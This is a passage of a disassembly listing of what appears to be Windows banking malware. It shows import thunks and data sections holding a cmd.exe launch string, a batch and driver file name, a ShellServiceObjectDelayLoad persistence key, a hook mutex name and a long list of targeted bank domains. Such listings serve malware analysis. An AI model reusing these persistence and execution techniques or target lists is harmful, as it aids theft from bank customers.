jmp ds:dword_448490
sub_40C7C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7D0 proc near ; CODE XREF: sub_404502+83�p
jmp ds:dword_448494
sub_40C7D0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7DC proc near ; CODE XREF: sub_404502+20�p
jmp ds:dword_448498
sub_40C7DC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7E8 proc near ; CODE XREF: sub_40A74E+805�p
jmp ds:dword_44849C
sub_40C7E8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C7F4 proc near ; CODE XREF: sub_40A74E+80E�p
jmp ds:dword_4484A0
sub_40C7F4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C800 proc near ; CODE XREF: sub_405004+6F�p
; sub_405004+F5�p ...
jmp ds:dword_4484A4
sub_40C800 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C80C proc near ; CODE XREF: sub_408EFF+1EC�p
; sub_408EFF+31A�p ...
jmp ds:dword_4484A8
sub_40C80C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C818 proc near ; CODE XREF: sub_40A74E+489�p
jmp ds:dword_4484AC
sub_40C818 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C824 proc near ; CODE XREF: sub_40B090+24B�p
jmp ds:dword_4484B0
sub_40C824 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C830 proc near ; CODE XREF: sub_408EFF+52�p
; sub_40B090+8E4�p
jmp ds:dword_4484B4
sub_40C830 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C83C proc near ; CODE XREF: sub_408EFF+AB�p
; sub_408EFF+125�p ...
jmp ds:dword_4484B8
sub_40C83C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C848 proc near ; CODE XREF: sub_40B090+277�p
; sub_40B090+823�p
jmp ds:dword_4484BC
sub_40C848 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C854 proc near ; CODE XREF: sub_40B090+1BC�p
jmp ds:dword_4484C0
sub_40C854 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C860 proc near ; CODE XREF: sub_40B090+907�p
jmp ds:dword_4484C4
sub_40C860 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C86C proc near ; CODE XREF: sub_40A74E+45E�p
jmp ds:dword_4484D0
sub_40C86C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C878 proc near ; CODE XREF: sub_40B090+30A�p
jmp ds:dword_4484D4
sub_40C878 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C884 proc near ; CODE XREF: sub_40B090+2EC�p
; sub_40B090+2F8�p
jmp ds:dword_4484D8
sub_40C884 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C890 proc near ; CODE XREF: sub_40B090+324�p
jmp ds:dword_4484DC
sub_40C890 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C89C proc near ; CODE XREF: sub_408EFF+1D6�p
; sub_408EFF+7D6�p
jmp ds:dword_4484E0
sub_40C89C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8A8 proc near ; CODE XREF: sub_4051C3+2B�p
jmp ds:dword_4484EC
sub_40C8A8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8B4 proc near ; CODE XREF: sub_4051C3+64�p
jmp ds:dword_4484F0
sub_40C8B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8C0 proc near ; CODE XREF: sub_4015B0+2F�p
; sub_4040BF+21�p
jmp ds:dword_4484F4
sub_40C8C0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8CC proc near ; CODE XREF: sub_401490+5F�p
; sub_4015B0+63�p ...
jmp ds:dword_4484F8
sub_40C8CC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8D8 proc near ; CODE XREF: sub_401490+22�p
jmp ds:dword_4484FC
sub_40C8D8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8E4 proc near ; CODE XREF: sub_401490+4A�p
jmp ds:dword_448500
sub_40C8E4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8F0 proc near ; CODE XREF: sub_4015B0+54�p
; sub_4040BF+48�p
jmp ds:dword_448504
sub_40C8F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C8FC proc near ; CODE XREF: sub_4022E4+12C�p
jmp ds:dword_448508
sub_40C8FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C908 proc near ; CODE XREF: sub_4022E4+162�p
jmp ds:dword_44850C
sub_40C908 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C914 proc near ; CODE XREF: sub_4022E4+148�p
jmp ds:dword_448510
sub_40C914 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C920 proc near ; CODE XREF: sub_405004+28�p
jmp ds:dword_448514
sub_40C920 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C92C proc near ; CODE XREF: sub_405004+187�p
jmp ds:dword_448518
sub_40C92C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C938 proc near ; CODE XREF: sub_405004+38�p
jmp ds:dword_44851C
sub_40C938 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C944 proc near ; CODE XREF: sub_40369B+39�p
jmp ds:dword_448528
sub_40C944 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C950 proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_44852C
sub_40C950 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C95C proc near ; CODE XREF: sub_406A35+1A0�p
; sub_406D91+7A�p ...
jmp ds:dword_448530
sub_40C95C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C968 proc near ; CODE XREF: sub_40538B+FF�p
; sub_40538B+199�p
jmp ds:dword_448534
sub_40C968 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C974 proc near ; CODE XREF: sub_409883+D7F�p
; sub_409883+DA1�p
jmp ds:dword_448538
sub_40C974 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C980 proc near ; CODE XREF: sub_401219+74�p
; sub_409883+CFE�p ...
jmp ds:dword_44853C
sub_40C980 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C98C proc near ; CODE XREF: sub_408884+128�p
jmp ds:dword_448540
sub_40C98C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C998 proc near ; CODE XREF: sub_40129C+19�p
; .text:0040140D�p ...
jmp ds:dword_448544
sub_40C998 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9A4 proc near ; CODE XREF: sub_4062A9+68�p
; sub_4062A9+224�p ...
jmp ds:dword_448548
sub_40C9A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9B0 proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_44854C
sub_40C9B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9BC proc near ; CODE XREF: sub_4016D2:loc_4016F9�p
; sub_403D18+3C�p ...
jmp ds:dword_448550
sub_40C9BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9C8 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_448554
sub_40C9C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9D4 proc near ; CODE XREF: sub_403883+3A�p
; .text:0040394B�p ...
jmp ds:dword_448558
sub_40C9D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9E0 proc near ; CODE XREF: sub_409883+72�p
; sub_40A74E+FF�p
jmp ds:dword_44855C
sub_40C9E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9EC proc near ; CODE XREF: sub_409883+A00�p
jmp ds:dword_448560
sub_40C9EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9F8 proc near ; CODE XREF: sub_4034C6+79�p
; sub_40355C+59�p ...
jmp ds:dword_448564
sub_40C9F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA04 proc near ; CODE XREF: sub_40C3D8+17�p
jmp ds:dword_448568
sub_40CA04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA10 proc near ; CODE XREF: sub_4062A9+48E�p
jmp ds:dword_44856C
sub_40CA10 endp
; ---------------------------------------------------------------------------
align 800h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0002E3A0 ( 189344.)
; Section size in file : 0002E3A0 ( 189344.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 40D000h
dword_40D000 dd 72656B5Ch ; sub_4083D0+98�r ...
aNel32_dll db 'nel32.dll',0
align 10h
dd 0
dd 73250000h, 646D635Ch, 6669702Eh, 2 dup(0)
db 0
aCmd_exeCStartC db '\cmd.exe /C start c:\boot.sys',0
align 4
dd 3E2h dup(0)
dword_40DFD0 dd 0 ; sub_40AF80+D1�r
dword_40DFD4 dd 0 ; sub_401D0D+48B�w ...
align 10h
dword_40DFE0 dd 40h dup(0) ; sub_409883+681�o ...
dword_40E0E0 dd 0 ; sub_40360B:loc_403691�r
dd 3E9h dup(0)
dword_40F088 dd 0 ; sub_401D0D+234�w ...
dword_40F08C dd 0 ; sub_401D0D+41F�r ...
dword_40F090 dd 0 ; sub_406D91+1090�r ...
byte_40F094 db 0 ; DATA XREF: sub_401D0D+131�w
align 10h
dword_40F0A0 dd 40h dup(0) ; sub_40A74E+383�o ...
dword_40F1A0 dd 0 ; sub_402AD6+FF�w ...
dd 0FFh dup(0)
dword_40F5A0 dd 0 ; sub_4037DF:loc_403879�r
dd 423h dup(0)
dword_410630 dd 0 ; sub_408EFF+822�r ...
align 10h
dword_410640 dd 0 ; .text:loc_401B79�r
dd 44Fh dup(0)
dword_411780 dd 0 dd 0FFh dup(0)
dword_411B80 dd 785C7325h ; sub_404129:loc_4041AC�r
aSlfdlnt_bat db 'slfdlnt.bat',0
dd 0
dd 25000000h, 6D635C73h, 69702E64h, 66h, 0
dd 6D635C00h, 78652E64h, 65h, 0
dd 6F6C3A00h, 0A0D706Fh, 6C656440h, 3E732520h, 0D6C756Eh
dd 6669400Ah, 69786520h, 25207473h, 6F672073h, 6C206F74h
dd 0D706F6Fh, 6564400Ah, 7325206Ch, 6C756E3Eh, 0A0Dh, 0
dd 73250000h, 20432F20h, 7325h, 42Fh dup(0)
dword_412CC0 dd 0 ; .text:loc_402563�r
dd 454h dup(0)
dword_413E14 dd 0 ; sub_40AF80+E9�r
dword_413E18 dd 0 ; sub_408EFF+86C�r ...
align 10h
dword_413E20 dd 0 ; sub_408BAE+9D�r
dd 42Dh dup(0)
byte_414ED8 db 0 ; DATA XREF: sub_401D0D+427�w
align 10h
byte_414EE0 db 0 ; DATA XREF: sub_401D0D+56�w
; sub_401D0D+5B�r ...
align 4
dword_414EE4 dd 0 ; sub_401D0D+1DE�w ...
align 10h
dword_414EF0 dd 40h dup(0) ; sub_409883+91B�o ...
dword_414FF0 dd 0 ; sub_402AD6+F3�r ...
dd 0FFh dup(0)
dword_4153F0 dd 0 ; sub_4080C5+90�r
dd 457h dup(0)
dword_416550 dd 0 ; .text:loc_40194C�r
dd 43Fh dup(0)
dword_417650 dd 0 ; sub_4045EF+5E�r
dd 417h dup(0)
dword_4186B0 dd 0 ; .text:0040223C�r
dd 41Bh dup(0)
dword_419720 dd 94h ; sub_40A74E+D6�o
dd 5, 1, 0A28h
dword_419730 dd 2 aServicePack2 db 'Service Pack 2',0
align 4
dd 1Fh dup(0)
dword_4197C0 dd 0 ; sub_40525E:loc_4052EA�r
dd 3EFh dup(0)
dword_41A780 dd 0 ; .text:00401486�r
dd 3FBh dup(0)
byte_41B770 db 0 ; DATA XREF: sub_401D0D+3E6�w
; sub_401D0D+3EB�r
align 4
dword_41B774 dd 0 ; sub_401D0D+D8�r ...
dword_41B778 dd 0 dword_41B77C dd 0 ; sub_4022E4+10C�r ...
dword_41B780 dd 6972645Ch ; sub_40129C:loc_401316�r
aVersNdisrd_sys db 'vers\ndisrd.sys',0
dd 65000000h, 6C62616Eh, 66736465h, 0
aSS_exe db '%s\%s.exe',0
align 10h
dd 454h dup(0)
dword_41C900 dd 0 ; sub_40A74E+7E1�r ...
align 10h
dword_41C910 dd 0 ; sub_40684E+90�r
dd 457h dup(0)
dword_41DA70 dd 0 ; sub_408EFF+1E6�r
dword_41DA74 dd 0 ; sub_408EFF+4C�r ...
dword_41DA78 dd 0 ; sub_4024CB+D�r
align 10h
dword_41DA80 dd 463Ah ; sub_40336C+87�r
dd 435h dup(0)
dword_41EB58 dd 0 ; sub_401D0D:loc_401D9A�w ...
dword_41EB5C dd 0 ; sub_408EFF+70E�r ...
dword_41EB60 dd 0 ; sub_40AF80+BC�r
dword_41EB64 dd 0 ; sub_408EFF+35F�r ...
dword_41EB68 dd 0 ; sub_40247C+3F�r
dword_41EB6C dd 400000h ; sub_408EFF+DA�r ...
dword_41EB70 dd 0 ; sub_401D0D+AF�w ...
align 10h
dword_41EB80 dd 3430257Bh ; sub_4039E6:loc_403A71�r
aX04x04x04x04x0 db 'X%04X-%04X-%04X-%04X-%04X%04X%04X}',0
align 4
dd 0
dd 30250000h, 5838h, 0
dd 73250000h, 2E73255Ch, 6C6C64h, 0
dd 43000000h, 4449534Ch, 5C73255Ch, 72506E49h, 6553636Fh
dd 72657672h, 3233h, 0
dd 68540000h, 64616572h, 4D676E69h, 6C65646Fh, 2 dup(0)
aApartment db 'Apartment',0
align 4
dd 0
db 0
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelay'
db 'Load',0
align 4
dd 3C3h dup(0)
dword_41FB64 dd 0 ; sub_40AF80+A1�r
align 10h
dword_41FB70 dd 40h dup(0) ; sub_40A74E+345�o ...
byte_41FC70 db 0 ; DATA XREF: sub_401D0D+188�w
align 4
dword_41FC74 dd 0 ; sub_408EFF+E2�r ...
align 10h
byte_41FC80 db 0 ; DATA XREF: sub_406D91+1B4�o
; sub_406D91+D91�o ...
byte_41FC81 db 0 ; DATA XREF: sub_406D91+F36�r
byte_41FC82 db 0 ; DATA XREF: sub_406D91+F3F�r
byte_41FC83 db 0 ; DATA XREF: sub_406D91+F48�r
dd 3FFFh dup(0)
byte_42FC80 db 0 ; DATA XREF: sub_401D0D+280�w
; sub_401D0D+285�r
align 4
dword_42FC84 dd 0 ; .text:0040806F�r ...
align 10h
dword_42FC90 dd 0 ; .text:loc_4017C8�r
dd 3F0h dup(0)
dword_430C54 dd 0 dword_430C58 dd 0 ; sub_4022E4+25�r
dword_430C5C dd 0 ; sub_408EFF+20C�r ...
byte_430C60 db 0 ; DATA XREF: sub_401D0D+318�w
; sub_401D0D+322�r ...
align 10h
dword_430C70 dd 0 ; .text:004044F8�r
dd 447h dup(0)
dword_431D90 dd 0 ; sub_406CF9+8E�r
dd 40Ah dup(0)
dword_432DBC dd 0 ; sub_408EFF+84C�r ...
dword_432DC0 dd 0 ; sub_40B090+2B5�r ...
dword_432DC4 dd 0 ; sub_408EFF+314�r ...
align 10h
dword_432DD0 dd 0 ; .text:00408760�r
dd 41Bh dup(0)
aCWindowsSystem db 'C:\WINDOWS\system32',0 ; DATA XREF: sub_403B8E+67�o
; sub_403D18+245�o ...
dd 3Bh dup(0)
byte_433F40 db 0 ; DATA XREF: sub_401320+92�o
; sub_40815F+11A�w ...
align 4
dd 3Fh dup(0)
dword_434040 dd 0 ; .text:00401A39�r
dd 1BFh dup(0)
db 3 dup(0)
byte_434743 db 0 ; DATA XREF: .data:off_44734F�o
dd 25Ch dup(0)
dword_4350B4 dd 0 ; sub_408EFF+88E�r ...
dword_4350B8 dd 0 ; sub_408EFF+89E�r
align 10h
dword_4350C0 dd 0 ; .text:loc_4015A6�r
dd 42Bh dup(0)
dword_436170 dd 0 ; sub_404F63:loc_404FFA�r
dd 3F3h dup(0)
dword_437140 dd 0 ; .text:00401D03�r
dd 447h dup(0)
dword_438260 dd 0 ; .text:loc_4016C8�r
dd 43Fh dup(0)
dword_439360 dd 0 ; .text:loc_408A45�r
dd 40Dh dup(0)
dword_43A398 dd 0 ; sub_40B090+2BD�r ...
align 10h
byte_43A3A0 db 0 ; DATA XREF: sub_401D0D+466�w
align 10h
dword_43A3B0 dd 0 ; .text:00408856�r
dd 3FBh dup(0)
_bss ends
; Section 3. (virtual address 0003C000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0003C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43C000h
dd offset dword_40D000
dd 43B3A0h, 8000h, 0
dword_43C010 dd 0 ; sub_40109A+110�w ...
dword_43C014 dd 12FF74h dd 0
dword_43C01C dd 0 dword_43C020 dd 1 ; sub_401219+5A�r
dword_43C024 dd 14A4E0h ; sub_401219+54�r
dword_43C028 dd 1471D8h ; sub_401219+4E�r
dword_43C02C dd 0 ; sub_40109A:loc_401208�r
dword_43C030 dd 0 dword_43C034 dd 0 ; sub_40109A+87�r ...
dword_43C038 dd 0 dword_43C03C dd 14h dup(0) ; sub_40109A+8F�o
dword_43C08C dd 0 dword_43C090 dd 0 ; sub_40109A+32�w
dword_43C094 dd 1 ; sub_408EFF+158�r ...
dword_43C098 dd 0Fh ; sub_408E57+63�r ...
dword_43C09C dd 31h ; sub_40129C:loc_4012C1�r ...
aKkqhook_30 db 'KKQHOOK_30',0 ; DATA XREF: sub_40A6EA+24�o
; sub_40A74E+4EC�o
aWmce db '$WmcE',0
aEl2w db '|EL2W',0
align 4
dword_43C0B8 dd 0 ; sub_409883+11A�r ...
dword_43C0BC dd 46h ; sub_409883+DB9�r ...
off_43C0C0 dd offset aSiliconfirewar ; DATA XREF: sub_409883+DF�r
; sub_409883+120�r
; "siliconfireware.ru"
dd offset aChechenpress_i ; "chechenpress.info"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aKavkazcenter_c ; "kavkazcenter.com/russ"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
db 0
aSoftwareMicros db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_409883+4D6�o
; sub_409883+5BD�o ...
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_409883+4D1�o
; sub_409883+5B8�o
a3fd db '3fd',0
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_409883+641�o
; sub_409883+7DA�o
aJy db 'jy#* ',0
align 4
dword_43C218 dd 0 ; sub_40B090:loc_40B26B�r ...
dword_43C21C dd 0 ; sub_40B090+A5�r ...
aBIV db 'b:I,V',0
aLImn db 'l iMn ',0 ; DATA XREF: sub_401320+1B�o
align 10h
dword_43C230 dd 3Bh ; sub_401D0D+99�w ...
dd 6, 0Bh
dword_43C23C dd 0 ; .text:loc_401420�r ...
dd 4, 12h
dword_43C248 dd 0 ; .text:loc_401544�r ...
dd 6, 0Dh
dword_43C254 dd 0 ; .text:loc_40166D�r ...
dd 4, 0Bh
dword_43C260 dd 0 ; .text:loc_401766�r ...
byte_43C264 db 0 ; DATA XREF: sub_4017D2+32�o
aDJy db 'D Jy',0 ; DATA XREF: sub_4017D2+80�o
byte_43C26A db 0 ; DATA XREF: sub_4017D2+93�o
dword_43C26B dd 2E617Ah align 10h
dd 6, 0Dh
dword_43C278 dd 0 ; .text:loc_4018F1�r ...
align 10h
dd 0Dh
dword_43C284 dd 0 ; .text:loc_4019D6�r ...
dd 7, 0Bh
dword_43C290 dd 0 ; .text:loc_401B23�r ...
aGxK db 'gx%K',0 ; DATA XREF: sub_401B83+C�o
aJv db 'jV',0 ; DATA XREF: sub_401B83+1C�o
aLkw db 27h,'lkW',0 ; DATA XREF: sub_401B83+3A�o
asc_43C2A1 db ':|',0 ; DATA XREF: sub_401B83+63�o
word_43C2A4 dw 59h ; DATA XREF: sub_401B83+A8�r
align 4
dd 6, 0Fh
dword_43C2B0 dd 0 ; .text:loc_401CA9�r ...
word_43C2B4 dw 6Bh ; DATA XREF: sub_401D0D+14�r
aRg db '~ /rG',0 ; DATA XREF: sub_401D0D+117�o
aOv db 'O',0 ; DATA XREF: sub_401D0D+14E�o
dword_43C2BF dd 275E27h align 4
off_43C2C4 dd offset loc_401D9A ; DATA XREF: sub_401D0D+75�r
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_402008
dd offset loc_401F81
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_401E11
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_401E11
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_401E11
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401DDC
dd offset loc_401DDC
dd offset loc_401E11
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401E11
dd offset loc_401E11
dd offset loc_401E9F
dd offset loc_401ECA
dd offset loc_401F4C
dd offset loc_401F12
dd offset loc_401E00
dd offset loc_401F00
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
